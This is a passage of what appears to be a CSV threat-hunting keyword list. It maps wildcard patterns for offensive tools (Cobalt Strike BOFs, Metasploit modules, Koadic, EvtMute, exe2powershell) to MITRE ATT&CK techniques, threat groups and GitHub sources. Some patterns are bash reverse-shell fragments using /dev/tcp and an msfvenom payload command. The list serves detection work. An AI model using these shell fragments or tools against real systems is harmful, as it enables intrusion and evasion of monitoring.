filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" +"*EvtMuteHook.sln*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" +"*EvtMute-master*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" +"*EVUAC *.exe*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","0","N/A","10","10","130","29","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z" +"*ewby/Mockingjay_BOF*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","9","10","32","7","2023-08-27T14:09:39Z","2023-08-27T06:01:28Z" +"*ewok -t *","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ewok (snmpwalk like)","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Information Gathering","https://github.com/wolf-project/NSA-TOOLS-SHADOW-BROKERS","1","0","N/A","N/A","1","32","17","2017-04-20T16:24:49Z","2017-05-13T19:51:23Z" +"*example-bof.sln*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" +"*examples/netview.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Excel-Exploit.git*","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","1","21","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z" +"*Excel-Exploit-main*","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","1","21","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z" +"*ExcelReflectImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*excelshellinject.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*exchange_proxylogon_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*exchange_proxynotshell_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*exe_dll_shellcode genetic.config*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","0","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" +"*exe_stager.exe*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*exe_to_dll.exe*","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" +"*exe_to_dll.exe*","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" +"*exe_to_dll_*.zip*","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" +"*exe_to_dll_*_32bit.zip*","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" +"*exe_to_dll_*_64bit.zip*","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" +"*exe_to_dll-master*","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" +"*exe_to_dll-master*","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" +"*exe2bat.cpp*","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","153","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" +"*exe2bat.exe*","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","153","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" +"*exe2powershell.cpp*","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","153","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" +"*exe2powershell.exe*","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","153","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" +"*exe2powershell-master*","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","153","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" +"*exec /bin/sh 0&0 2>&0*","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*exec 5<>/dev/tcp/*/**cat <&5 | while read line* do $line 2>&5 >&5* done*","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*exec CMD=/bin/sh -f elf -o *.elf*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Exec_Command_Silent.vbs*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*Exec_Command_WithOutput.vbs*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*exec_payload_msi*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*exec_shellcode.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ExecCmdImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*Exec-Command-Silent.vbs*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"*--exec-method smbexec*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*execmethod*PowerPick*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*execmethod*PowerShell*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*execPayloads.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*Executable_Files-main.zip*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*execute_assembly -Assembly *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*execute_assembly SharpCloud*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" +"*execute_bof *","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" +"*execute_dotnet_assembly.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*execute_pe -PE*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*execute_Pezor*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*execute_shellcode *","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*Execute-ACLight.bat*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*Execute-ACLight2.bat*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*execute-assembly *","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*execute-assembly *.exe *","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 